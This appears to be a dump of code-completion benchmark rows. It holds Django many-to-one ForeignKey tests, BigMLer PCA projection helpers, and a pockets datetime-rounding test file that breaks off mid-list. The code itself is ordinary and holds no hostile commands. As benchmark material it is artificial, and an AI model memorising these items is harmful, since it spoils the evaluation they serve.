gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
import datetime
from copy import deepcopy
from django.core.exceptions import FieldError, MultipleObjectsReturned
from django.db import models, transaction
from django.test import TestCase
from django.utils import six
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.translation import ugettext_lazy
from .models import (
Article, Category, Child, City, District, First, Parent, Record, Relation,
Reporter, School, Student, Third, ToFieldChild,
)
class ManyToOneTests(TestCase):
    def setUp(self):
        """Creates two Reporters and one Article (owned by the first one)."""
        # Create a few Reporters.
        self.r = Reporter(first_name='John', last_name='Smith', email='john@example.com')
        self.r.save()
        self.r2 = Reporter(first_name='Paul', last_name='Jones', email='paul@example.com')
        self.r2.save()
        # Create an Article.
        self.a = Article(id=None, headline="This is a test",
            pub_date=datetime.date(2005, 7, 27), reporter=self.r)
        self.a.save()
    def test_get(self):
        """Accessing the forward side of the ForeignKey returns the Reporter."""
        # Article objects have access to their related Reporter objects.
        r = self.a.reporter
        self.assertEqual(r.id, self.r.id)
        # These are strings instead of unicode strings because that's what was used in
        # the creation of this reporter (and we haven't refreshed the data from the
        # database, which always returns unicode strings).
        self.assertEqual((r.first_name, self.r.last_name), ('John', 'Smith'))
def test_create(self):
# You can also instantiate an Article by passing the Reporter's ID
# instead of a Reporter object.
a3 = Article(id=None, headline="Third article",
pub_date=datetime.date(2005, 7, 27), reporter_id=self.r.id)
a3.save()
self.assertEqual(a3.reporter.id, self.r.id)
# Similarly, the reporter ID can be a string.
a4 = Article(id=None, headline="Fourth article",
pub_date=datetime.date(2005, 7, 27), reporter_id=str(self.r.id))
a4.save()
self.assertEqual(repr(a4.reporter), "<Reporter: John Smith>")
def test_add(self):
# Create an Article via the Reporter object.
new_article = self.r.article_set.create(headline="John's second story",
pub_date=datetime.date(2005, 7, 29))
self.assertEqual(repr(new_article), "<Article: John's second story>")
self.assertEqual(new_article.reporter.id, self.r.id)
# Create a new article, and add it to the article set.
new_article2 = Article(headline="Paul's story", pub_date=datetime.date(2006, 1, 17))
msg = "<Article: Paul's story> instance isn't saved. Use bulk=False or save the object first."
with self.assertRaisesMessage(ValueError, msg):
self.r.article_set.add(new_article2)
self.r.article_set.add(new_article2, bulk=False)
self.assertEqual(new_article2.reporter.id, self.r.id)
self.assertQuerysetEqual(self.r.article_set.all(),
[
"<Article: John's second story>",
"<Article: Paul's story>",
"<Article: This is a test>",
])
# Add the same article to a different article set - check that it moves.
self.r2.article_set.add(new_article2)
self.assertEqual(new_article2.reporter.id, self.r2.id)
self.assertQuerysetEqual(self.r2.article_set.all(), ["<Article: Paul's story>"])
# Adding an object of the wrong type raises TypeError.
with transaction.atomic():
with six.assertRaisesRegex(self, TypeError,
"'Article' instance expected, got <Reporter.*"):
self.r.article_set.add(self.r2)
self.assertQuerysetEqual(self.r.article_set.all(),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
def test_set(self):
new_article = self.r.article_set.create(headline="John's second story",
pub_date=datetime.date(2005, 7, 29))
new_article2 = self.r2.article_set.create(headline="Paul's story",
pub_date=datetime.date(2006, 1, 17))
# Assign the article to the reporter.
new_article2.reporter = self.r
new_article2.save()
self.assertEqual(repr(new_article2.reporter), "<Reporter: John Smith>")
self.assertEqual(new_article2.reporter.id, self.r.id)
self.assertQuerysetEqual(self.r.article_set.all(), [
"<Article: John's second story>",
"<Article: Paul's story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(self.r2.article_set.all(), [])
# Set the article back again.
self.r2.article_set.set([new_article, new_article2])
self.assertQuerysetEqual(self.r.article_set.all(), ["<Article: This is a test>"])
self.assertQuerysetEqual(self.r2.article_set.all(),
[
"<Article: John's second story>",
"<Article: Paul's story>",
])
# Funny case - because the ForeignKey cannot be null,
# existing members of the set must remain.
self.r.article_set.set([new_article])
self.assertQuerysetEqual(self.r.article_set.all(),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(self.r2.article_set.all(), ["<Article: Paul's story>"])
def test_reverse_assignment_deprecation(self):
msg = (
"Direct assignment to the reverse side of a related set is "
"deprecated due to the implicit save() that happens. Use "
"article_set.set() instead."
)
with self.assertRaisesMessage(RemovedInDjango20Warning, msg):
self.r2.article_set = []
def test_assign(self):
new_article = self.r.article_set.create(headline="John's second story",
pub_date=datetime.date(2005, 7, 29))
new_article2 = self.r2.article_set.create(headline="Paul's story",
pub_date=datetime.date(2006, 1, 17))
# Assign the article to the reporter directly using the descriptor.
new_article2.reporter = self.r
new_article2.save()
self.assertEqual(repr(new_article2.reporter), "<Reporter: John Smith>")
self.assertEqual(new_article2.reporter.id, self.r.id)
self.assertQuerysetEqual(self.r.article_set.all(), [
"<Article: John's second story>",
"<Article: Paul's story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(self.r2.article_set.all(), [])
# Set the article back again using set() method.
self.r2.article_set.set([new_article, new_article2])
self.assertQuerysetEqual(self.r.article_set.all(), ["<Article: This is a test>"])
self.assertQuerysetEqual(self.r2.article_set.all(),
[
"<Article: John's second story>",
"<Article: Paul's story>",
])
# Because the ForeignKey cannot be null, existing members of the set
# must remain.
self.r.article_set.set([new_article])
self.assertQuerysetEqual(self.r.article_set.all(),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(self.r2.article_set.all(), ["<Article: Paul's story>"])
# Reporter cannot be null - there should not be a clear or remove method
self.assertFalse(hasattr(self.r2.article_set, 'remove'))
self.assertFalse(hasattr(self.r2.article_set, 'clear'))
def test_selects(self):
self.r.article_set.create(headline="John's second story",
pub_date=datetime.date(2005, 7, 29))
self.r2.article_set.create(headline="Paul's story",
pub_date=datetime.date(2006, 1, 17))
# Reporter objects have access to their related Article objects.
self.assertQuerysetEqual(self.r.article_set.all(), [
"<Article: John's second story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(self.r.article_set.filter(headline__startswith='This'),
["<Article: This is a test>"])
self.assertEqual(self.r.article_set.count(), 2)
self.assertEqual(self.r2.article_set.count(), 1)
# Get articles by id
self.assertQuerysetEqual(Article.objects.filter(id__exact=self.a.id),
["<Article: This is a test>"])
self.assertQuerysetEqual(Article.objects.filter(pk=self.a.id),
["<Article: This is a test>"])
# Query on an article property
self.assertQuerysetEqual(Article.objects.filter(headline__startswith='This'),
["<Article: This is a test>"])
# The API automatically follows relationships as far as you need.
# Use double underscores to separate relationships.
# This works as many levels deep as you want. There's no limit.
# Find all Articles for any Reporter whose first name is "John".
self.assertQuerysetEqual(Article.objects.filter(reporter__first_name__exact='John'),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
# Check that implied __exact also works
self.assertQuerysetEqual(Article.objects.filter(reporter__first_name='John'),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
# Query twice over the related field.
self.assertQuerysetEqual(
Article.objects.filter(reporter__first_name__exact='John',
reporter__last_name__exact='Smith'),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
# The underlying query only makes one join when a related table is referenced twice.
queryset = Article.objects.filter(reporter__first_name__exact='John',
reporter__last_name__exact='Smith')
self.assertNumQueries(1, list, queryset)
self.assertEqual(queryset.query.get_compiler(queryset.db).as_sql()[0].count('INNER JOIN'), 1)
# The automatically joined table has a predictable name.
self.assertQuerysetEqual(
Article.objects.filter(reporter__first_name__exact='John').extra(
where=["many_to_one_reporter.last_name='Smith'"]),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
# ... and should work fine with the unicode that comes out of forms.Form.cleaned_data
self.assertQuerysetEqual(
(Article.objects
.filter(reporter__first_name__exact='John')
.extra(where=["many_to_one_reporter.last_name='%s'" % 'Smith'])),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
# Find all Articles for a Reporter.
# Use direct ID check, pk check, and object comparison
self.assertQuerysetEqual(
Article.objects.filter(reporter__id__exact=self.r.id),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(
Article.objects.filter(reporter__pk=self.r.id),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(
Article.objects.filter(reporter=self.r.id),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(
Article.objects.filter(reporter=self.r),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(
Article.objects.filter(reporter__in=[self.r.id, self.r2.id]).distinct(),
[
"<Article: John's second story>",
"<Article: Paul's story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(
Article.objects.filter(reporter__in=[self.r, self.r2]).distinct(),
[
"<Article: John's second story>",
"<Article: Paul's story>",
"<Article: This is a test>",
])
# You can also use a queryset instead of a literal list of instances.
# The queryset must be reduced to a list of values using values(),
# then converted into a query
self.assertQuerysetEqual(
Article.objects.filter(
reporter__in=Reporter.objects.filter(first_name='John').values('pk').query
).distinct(),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
def test_reverse_selects(self):
a3 = Article.objects.create(id=None, headline="Third article",
pub_date=datetime.date(2005, 7, 27), reporter_id=self.r.id)
Article.objects.create(id=None, headline="Fourth article",
pub_date=datetime.date(2005, 7, 27), reporter_id=str(self.r.id))
# Reporters can be queried
self.assertQuerysetEqual(Reporter.objects.filter(id__exact=self.r.id),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(Reporter.objects.filter(pk=self.r.id),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(Reporter.objects.filter(first_name__startswith='John'),
["<Reporter: John Smith>"])
# Reporters can query in opposite direction of ForeignKey definition
self.assertQuerysetEqual(Reporter.objects.filter(article__id__exact=self.a.id),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(Reporter.objects.filter(article__pk=self.a.id),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(Reporter.objects.filter(article=self.a.id),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(Reporter.objects.filter(article=self.a),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(
Reporter.objects.filter(article__in=[self.a.id, a3.id]).distinct(),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(
Reporter.objects.filter(article__in=[self.a.id, a3]).distinct(),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(
Reporter.objects.filter(article__in=[self.a, a3]).distinct(),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(
Reporter.objects.filter(article__headline__startswith='T'),
["<Reporter: John Smith>", "<Reporter: John Smith>"],
ordered=False
)
self.assertQuerysetEqual(
Reporter.objects.filter(article__headline__startswith='T').distinct(),
["<Reporter: John Smith>"])
# Counting in the opposite direction works in conjunction with distinct()
self.assertEqual(
Reporter.objects.filter(article__headline__startswith='T').count(), 2)
self.assertEqual(
Reporter.objects.filter(article__headline__startswith='T').distinct().count(), 1)
# Queries can go round in circles.
self.assertQuerysetEqual(
Reporter.objects.filter(article__reporter__first_name__startswith='John'),
[
"<Reporter: John Smith>",
"<Reporter: John Smith>",
"<Reporter: John Smith>",
],
ordered=False
)
self.assertQuerysetEqual(
Reporter.objects.filter(article__reporter__first_name__startswith='John').distinct(),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(
Reporter.objects.filter(article__reporter__exact=self.r).distinct(),
["<Reporter: John Smith>"])
# Check that implied __exact also works.
self.assertQuerysetEqual(
Reporter.objects.filter(article__reporter=self.r).distinct(),
["<Reporter: John Smith>"])
# It's possible to use values() calls across many-to-one relations.
# (Note, too, that we clear the ordering here so as not to drag the
# 'headline' field into the columns being used to determine uniqueness)
d = {'reporter__first_name': 'John', 'reporter__last_name': 'Smith'}
self.assertEqual([d],
list(Article.objects.filter(reporter=self.r).distinct().order_by()
.values('reporter__first_name', 'reporter__last_name')))
def test_select_related(self):
# Check that Article.objects.select_related().dates() works properly when
# there are multiple Articles with the same date but different foreign-key
# objects (Reporters).
r1 = Reporter.objects.create(first_name='Mike', last_name='Royko', email='royko@suntimes.com')
r2 = Reporter.objects.create(first_name='John', last_name='Kass', email='jkass@tribune.com')
Article.objects.create(headline='First', pub_date=datetime.date(1980, 4, 23), reporter=r1)
Article.objects.create(headline='Second', pub_date=datetime.date(1980, 4, 23), reporter=r2)
self.assertEqual(list(Article.objects.select_related().dates('pub_date', 'day')),
[
datetime.date(1980, 4, 23),
datetime.date(2005, 7, 27),
])
self.assertEqual(list(Article.objects.select_related().dates('pub_date', 'month')),
[
datetime.date(1980, 4, 1),
datetime.date(2005, 7, 1),
])
self.assertEqual(list(Article.objects.select_related().dates('pub_date', 'year')),
[
datetime.date(1980, 1, 1),
datetime.date(2005, 1, 1),
])
def test_delete(self):
self.r.article_set.create(headline="John's second story",
pub_date=datetime.date(2005, 7, 29))
self.r2.article_set.create(headline="Paul's story",
pub_date=datetime.date(2006, 1, 17))
Article.objects.create(id=None, headline="Third article",
pub_date=datetime.date(2005, 7, 27), reporter_id=self.r.id)
Article.objects.create(id=None, headline="Fourth article",
pub_date=datetime.date(2005, 7, 27), reporter_id=str(self.r.id))
# If you delete a reporter, his articles will be deleted.
self.assertQuerysetEqual(Article.objects.all(),
[
"<Article: Fourth article>",
"<Article: John's second story>",
"<Article: Paul's story>",
"<Article: Third article>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(Reporter.objects.order_by('first_name'),
[
"<Reporter: John Smith>",
"<Reporter: Paul Jones>",
])
self.r2.delete()
self.assertQuerysetEqual(Article.objects.all(),
[
"<Article: Fourth article>",
"<Article: John's second story>",
"<Article: Third article>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(Reporter.objects.order_by('first_name'),
["<Reporter: John Smith>"])
# You can delete using a JOIN in the query.
Reporter.objects.filter(article__headline__startswith='This').delete()
self.assertQuerysetEqual(Reporter.objects.all(), [])
self.assertQuerysetEqual(Article.objects.all(), [])
def test_explicit_fk(self):
# Create a new Article with get_or_create using an explicit value
# for a ForeignKey.
a2, created = Article.objects.get_or_create(id=None,
headline="John's second test",
pub_date=datetime.date(2011, 5, 7),
reporter_id=self.r.id)
self.assertTrue(created)
self.assertEqual(a2.reporter.id, self.r.id)
# You can specify filters containing the explicit FK value.
self.assertQuerysetEqual(
Article.objects.filter(reporter_id__exact=self.r.id),
[
"<Article: John's second test>",
"<Article: This is a test>",
])
# Create an Article by Paul for the same date.
a3 = Article.objects.create(id=None, headline="Paul's commentary",
pub_date=datetime.date(2011, 5, 7),
reporter_id=self.r2.id)
self.assertEqual(a3.reporter.id, self.r2.id)
# Get should respect explicit foreign keys as well.
with self.assertRaises(MultipleObjectsReturned):
Article.objects.get(reporter_id=self.r.id)
self.assertEqual(repr(a3),
repr(Article.objects.get(reporter_id=self.r2.id,
pub_date=datetime.date(2011, 5, 7))))
    def test_deepcopy_and_circular_references(self):
        # Regression for #12876 -- Model instances holding querysets that
        # refer back to the instance itself don't cause recursion depth
        # problems under deepcopy.
        self.r.cached_query = Article.objects.filter(reporter=self.r)
        self.assertEqual(repr(deepcopy(self.r)), "<Reporter: John Smith>")
    def test_manager_class_caching(self):
        """The dynamically built related-manager class is created once and
        reused: repeated accesses on the same instance, and accesses on
        different instances, yield the identical class object."""
        r1 = Reporter.objects.create(first_name='Mike')
        r2 = Reporter.objects.create(first_name='John')
        # Same twice
        self.assertIs(r1.article_set.__class__, r1.article_set.__class__)
        # Same as each other
        self.assertIs(r1.article_set.__class__, r2.article_set.__class__)
def test_create_relation_with_ugettext_lazy(self):
reporter = Reporter.objects.create(first_name='John',
last_name='Smith',
email='john.smith@example.com')
lazy = ugettext_lazy('test')
reporter.article_set.create(headline=lazy,
pub_date=datetime.date(2011, 6, 10))
notlazy = six.text_type(lazy)
article = reporter.article_set.get()
self.assertEqual(article.headline, notlazy)
def test_values_list_exception(self):
expected_message = "Cannot resolve keyword 'notafield' into field. Choices are: %s"
reporter_fields = ', '.join(sorted(f.name for f in Reporter._meta.get_fields()))
with self.assertRaisesMessage(FieldError, expected_message % reporter_fields):
Article.objects.values_list('reporter__notafield')
article_fields = ', '.join(['EXTRA'] + sorted(f.name for f in Article._meta.get_fields()))
with self.assertRaisesMessage(FieldError, expected_message % article_fields):
Article.objects.extra(select={'EXTRA': 'EXTRA_SELECT'}).values_list('notafield')
def test_fk_assignment_and_related_object_cache(self):
# Tests of ForeignKey assignment and the related-object cache (see #6886).
p = Parent.objects.create(name="Parent")
c = Child.objects.create(name="Child", parent=p)
# Look up the object again so that we get a "fresh" object.
c = Child.objects.get(name="Child")
p = c.parent
# Accessing the related object again returns the exactly same object.
self.assertIs(c.parent, p)
# But if we kill the cache, we get a new object.
del c._parent_cache
self.assertIsNot(c.parent, p)
# Assigning a new object results in that object getting cached immediately.
p2 = Parent.objects.create(name="Parent 2")
c.parent = p2
self.assertIs(c.parent, p2)
# Assigning None succeeds if field is null=True.
p.bestchild = None
self.assertIsNone(p.bestchild)
# bestchild should still be None after saving.
p.save()
self.assertIsNone(p.bestchild)
# bestchild should still be None after fetching the object again.
p = Parent.objects.get(name="Parent")
self.assertIsNone(p.bestchild)
# Assigning None fails: Child.parent is null=False.
with self.assertRaises(ValueError):
setattr(c, "parent", None)
# You also can't assign an object of the wrong type here
with self.assertRaises(ValueError):
setattr(c, "parent", First(id=1, second=1))
# Nor can you explicitly assign None to Child.parent during object
# creation (regression for #9649).
with self.assertRaises(ValueError):
Child(name='xyzzy', parent=None)
with self.assertRaises(ValueError):
Child.objects.create(name='xyzzy', parent=None)
# Creation using keyword argument should cache the related object.
p = Parent.objects.get(name="Parent")
c = Child(parent=p)
self.assertIs(c.parent, p)
# Creation using keyword argument and unsaved related instance (#8070).
p = Parent()
msg = "save() prohibited to prevent data loss due to unsaved related object 'parent'."
with self.assertRaisesMessage(ValueError, msg):
Child.objects.create(parent=p)
msg = "save() prohibited to prevent data loss due to unsaved related object 'parent'."
with self.assertRaisesMessage(ValueError, msg):
ToFieldChild.objects.create(parent=p)
# Creation using attname keyword argument and an id will cause the
# related object to be fetched.
p = Parent.objects.get(name="Parent")
c = Child(parent_id=p.id)
self.assertIsNot(c.parent, p)
self.assertEqual(c.parent, p)
def test_fk_to_bigautofield(self):
ch = City.objects.create(name='Chicago')
District.objects.create(city=ch, name='Far South')
District.objects.create(city=ch, name='North')
ny = City.objects.create(name='New York', id=2 ** 33)
District.objects.create(city=ny, name='Brooklyn')
District.objects.create(city=ny, name='Manhattan')
def test_multiple_foreignkeys(self):
# Test of multiple ForeignKeys to the same model (bug #7125).
c1 = Category.objects.create(name='First')
c2 = Category.objects.create(name='Second')
c3 = Category.objects.create(name='Third')
r1 = Record.objects.create(category=c1)
r2 = Record.objects.create(category=c1)
r3 = Record.objects.create(category=c2)
r4 = Record.objects.create(category=c2)
r5 = Record.objects.create(category=c3)
Relation.objects.create(left=r1, right=r2)
Relation.objects.create(left=r3, right=r4)
Relation.objects.create(left=r1, right=r3)
Relation.objects.create(left=r5, right=r2)
Relation.objects.create(left=r3, right=r2)
q1 = Relation.objects.filter(left__category__name__in=['First'], right__category__name__in=['Second'])
self.assertQuerysetEqual(q1, ["<Relation: First - Second>"])
q2 = Category.objects.filter(record__left_set__right__category__name='Second').order_by('name')
self.assertQuerysetEqual(q2, ["<Category: First>", "<Category: Second>"])
p = Parent.objects.create(name="Parent")
c = Child.objects.create(name="Child", parent=p)
with self.assertRaises(ValueError):
Child.objects.create(name="Grandchild", parent=c)
    def test_fk_instantiation_outside_model(self):
        # Regression for #12190 -- Should be able to instantiate a FK outside
        # of a model, and interrogate its related field.
        cat = models.ForeignKey(Category, models.CASCADE)
        # The FK targets Category's primary key field, named 'id'.
        self.assertEqual('id', cat.remote_field.get_related_field().name)
    def test_relation_unsaved(self):
        # Test that the <field>_set manager does not join on Null value fields (#17541)
        Third.objects.create(name='Third 1')
        Third.objects.create(name='Third 2')
        th = Third(name="testing")
        # The object isn't saved and thus the relation field is null - we won't even
        # execute a query in this case.
        with self.assertNumQueries(0):
            self.assertEqual(th.child_set.count(), 0)
        th.save()
        # Now the model is saved, so we will need to execute a query.
        with self.assertNumQueries(1):
            self.assertEqual(th.child_set.count(), 0)
    def test_related_object(self):
        """Related-object access uses the base manager, so filtering done by a
        custom default manager doesn't hide the related instance."""
        public_school = School.objects.create(is_public=True)
        public_student = Student.objects.create(school=public_school)
        private_school = School.objects.create(is_public=False)
        private_student = Student.objects.create(school=private_school)
        # Only one school is available via all() due to the custom default manager.
        self.assertQuerysetEqual(
            School.objects.all(),
            ["<School: School object>"]
        )
        self.assertEqual(public_student.school, public_school)
        # Make sure the base manager is used so that a student can still access
        # its related school even if the default manager doesn't normally
        # allow it.
        self.assertEqual(private_student.school, private_school)
        # If the manager is marked "use_for_related_fields", it'll get used instead
        # of the "bare" queryset. Usually you'd define this as a property on the class,
        # but this approximates that in a way that's easier in tests.
        School.objects.use_for_related_fields = True
        try:
            private_student = Student.objects.get(pk=private_student.pk)
            with self.assertRaises(School.DoesNotExist):
                private_student.school
        finally:
            School.objects.use_for_related_fields = False
    def test_hasattr_related_object(self):
        # The exception raised on attribute access when a related object
        # doesn't exist should be an instance of a subclass of `AttributeError`
        # so that hasattr() returns False rather than propagating it.
        # refs #21563
        self.assertFalse(hasattr(Article(), 'reporter'))
| |
# -*- coding: utf-8 -*-
#
# Copyright 2019-2020 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Linear regression prediction auxiliary functions
"""
import sys
import bigml.api
from bigml.pca import PCA
from bigml.io import UnicodeWriter
import bigmler.utils as u
import bigmler.checkpoint as c
from bigmler.tst_reader import TstReader as TestReader
from bigmler.resourcesapi.batch_projections import create_batch_projection
def use_projection_headers(projection_headers, output, test_reader,
                           fields, args, pca_headers):
    """Uses header information from the test file in the projection output.

    If --projection-header is set, adds a headers row to the projection
    file.
    If --projection-fields is used, retrieves the fields to include
    in the projections output.

    Returns the list of column indexes (sorted in descending order) that
    must be removed from every input row before it is written.
    """
    exclude = []
    headers = []
    if args.projection_fields:
        if test_reader.has_headers():
            headers = test_reader.raw_headers[:]
        else:
            # if no headers are found in the test file we assume it has the
            # same model input_field structure
            headers = [fields[field]['name'] for field in
                       fields.fields_columns]
        if args.projection_fields not in [None, "all"]:
            projection_fields = [field.strip() for field in
                                 args.projection_fields.split(',')]
            # Keep only the headers explicitly chosen by the user; the rest
            # are excluded by (descending) column index so that in-place
            # deletions don't shift the remaining positions.
            exclude = sorted(
                {index for index, header in enumerate(headers)
                 if header not in projection_fields},
                reverse=True)
            for index in exclude:
                del headers[index]
    headers.extend(pca_headers)
    if projection_headers:
        output.writerow(headers)
    return exclude
def write_projection(projection, output=sys.stdout,
                     input_data=None,
                     exclude=None):
    """Writes the final projection to the required output.

    The format of the output depends on the `prediction_info` value.
    There's a brief format, that writes only the predicted value,
    and a full data format that writes first the input data
    used to predict followed by the prediction.

    `output` must expose either a `writerow` (csv-writer-like) or a
    `write` method; otherwise an AttributeError is raised.
    """
    # input data is added if --projection-fields is used.
    # Work on a copy: deleting excluded columns must not mutate the
    # caller's input_data list.
    row = [] if input_data is None else list(input_data)
    if exclude and row:
        # `exclude` holds indexes in descending order, so sequential
        # deletion keeps the remaining positions valid.
        for index in exclude:
            del row[index]
    row.extend(projection)
    try:
        output.writerow(row)
    except AttributeError:
        try:
            output.write(row)
        except AttributeError:
            raise AttributeError("You should provide a writeable object")
def _local_pca(pca, args):
    """Builds the local PCA object plus the keyword arguments that will be
    forwarded to its projection calls.
    """
    projection_kwargs = {}
    for option in ("max_components", "variance_threshold"):
        value = getattr(args, option)
        if value:
            projection_kwargs[option] = value
    return PCA(pca, api=args.retrieve_api_), projection_kwargs
def local_projection(local_pca, kwargs, test_reader, output, args,
                     exclude=None):
    """Computes a projection locally for every row in `test_reader` and
    writes each result to `output`.
    """
    # Input data is echoed into the output only when --projection-fields
    # was used.
    add_input = args.projection_fields is not None
    for input_data in test_reader:
        as_dict = test_reader.dict(input_data, filtering=False)
        write_projection(
            local_pca.projection(as_dict, **kwargs),
            output,
            input_data if add_input else None,
            exclude)
def projection(pca, fields, args, session_file=None):
    """Computes the projection
    for each entry in the `test_set`.

    Reads rows from args.test_set, projects them with a locally built PCA
    model and writes the results (CSV) to args.projections.
    """
    test_set = args.test_set
    test_set_header = args.test_header
    output = args.projections
    test_reader = TestReader(test_set, test_set_header, fields, None,
                             test_separator=args.test_separator)
    with UnicodeWriter(output, lineterminator="\n") as output:
        local_pca, kwargs = _local_pca(pca, args)
        # One output column per principal component; projecting an empty
        # input reveals how many components the model produces.
        pca_headers = ["PC%s" % (i + 1) for i in \
            range(0, len(local_pca.projection({})))]
        # columns to exclude if input_data is added to the projections field
        exclude = use_projection_headers(
            args.projection_header, output, test_reader, fields, args,
            pca_headers)
        # Local projection: Projections are computed locally
        message = u.dated("Creating local projections.\n")
        u.log_message(message, log_file=session_file, console=args.verbosity)
        local_projection(local_pca, kwargs, test_reader,
                         output, args, exclude=exclude)
    test_reader.close()
def remote_projection(pca, test_dataset,
                      batch_projection_args, args,
                      api, resume, projection_file=None, session_file=None,
                      path=None, log=None):
    """Computes a projection for each entry in the `test_set`.

    Projections are computed remotely using the batch projection call.
    When `resume` is set, tries to recover an already-created batch
    projection from the checkpoint logs before creating a new one.
    Optionally downloads the result CSV and registers the output dataset.
    """
    pca_id = bigml.api.get_pca_id(pca)
    # if resuming, try to extract dataset form log files
    if resume:
        message = u.dated("Batch projection not found. Resuming.\n")
        resume, batch_projection = c.checkpoint(
            c.is_batch_projection_created, path, debug=args.debug,
            message=message, log_file=session_file, console=args.verbosity)
    # Only create a new batch projection if none was recovered above.
    if not resume:
        batch_projection = create_batch_projection(
            pca_id, test_dataset, batch_projection_args,
            args, api, session_file=session_file, path=path, log=log)
    if not args.no_csv:
        file_name = api.download_batch_projection(batch_projection,
                                                  projection_file)
        if file_name is None:
            sys.exit("Failed downloading CSV.")
    if args.to_dataset:
        # Wait for the batch projection to finish so its output dataset
        # id is available, then log it as a created resource.
        batch_projection = bigml.api.check_resource(batch_projection, api=api)
        new_dataset = bigml.api.get_dataset_id(
            batch_projection['object']['output_dataset_resource'])
        if new_dataset is not None:
            message = u.dated("Batch projection dataset created: %s\n"
                              % u.get_url(new_dataset))
            u.log_message(message, log_file=session_file,
                          console=args.verbosity)
            u.log_created_resources("batch_projection_dataset",
                                    path, new_dataset, mode='a')
| |
# -*- coding: utf-8 -*-
# Copyright (c) 2018 the Pockets team, see AUTHORS.
# Licensed under the BSD License, see LICENSE for details.
"""Tests for :mod:`pockets.collections` module."""
from __future__ import absolute_import, print_function
from datetime import datetime, timedelta
import pytest
import pytz
from pockets.datetime import ceil_datetime, floor_datetime, round_datetime
NEW_YORK = pytz.timezone("America/New_York")
# Each case is (input datetime, rounding granularity, expected ceiling).
# Cases cover minute, hour and day granularity, naive and tz-aware inputs.
# NOTE(review): datetime(..., tzinfo=NEW_YORK) attaches pytz's LMT offset
# rather than EST/EDT; input and expected are built the same way, so the
# equality checks stay consistent — confirm this is intended.
@pytest.mark.parametrize(
    "dt,nearest,expected",
    [
        # nearest minute, naive
        (
            datetime(2012, 12, 31, 23, 59, 31, 999999),
            timedelta(minutes=1),
            datetime(2013, 1, 1),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 31),
            timedelta(minutes=1),
            datetime(2013, 1, 1),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 30),
            timedelta(minutes=1),
            datetime(2013, 1, 1),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 29),
            timedelta(minutes=1),
            datetime(2013, 1, 1),
        ),
        # nearest minute, tz-aware
        (
            datetime(2012, 12, 31, 23, 59, 31, tzinfo=NEW_YORK),
            timedelta(minutes=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 30, tzinfo=NEW_YORK),
            timedelta(minutes=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 29, tzinfo=NEW_YORK),
            timedelta(minutes=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
        # nearest hour, naive
        (
            datetime(2012, 12, 31, 23, 31),
            timedelta(hours=1),
            datetime(2013, 1, 1),
        ),
        (
            datetime(2012, 12, 31, 23, 30),
            timedelta(hours=1),
            datetime(2013, 1, 1),
        ),
        (
            datetime(2012, 12, 31, 23, 29),
            timedelta(hours=1),
            datetime(2013, 1, 1),
        ),
        # nearest hour, tz-aware
        (
            datetime(2012, 12, 31, 23, 31, tzinfo=NEW_YORK),
            timedelta(hours=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 23, 30, tzinfo=NEW_YORK),
            timedelta(hours=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 23, 29, tzinfo=NEW_YORK),
            timedelta(hours=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
        # nearest day, naive
        (datetime(2012, 12, 31, 13), timedelta(days=1), datetime(2013, 1, 1)),
        (datetime(2012, 12, 31, 12), timedelta(days=1), datetime(2013, 1, 1)),
        (datetime(2012, 12, 31, 11), timedelta(days=1), datetime(2013, 1, 1)),
        # nearest day, tz-aware
        (
            datetime(2012, 12, 31, 13, tzinfo=NEW_YORK),
            timedelta(days=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 12, tzinfo=NEW_YORK),
            timedelta(days=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
        (
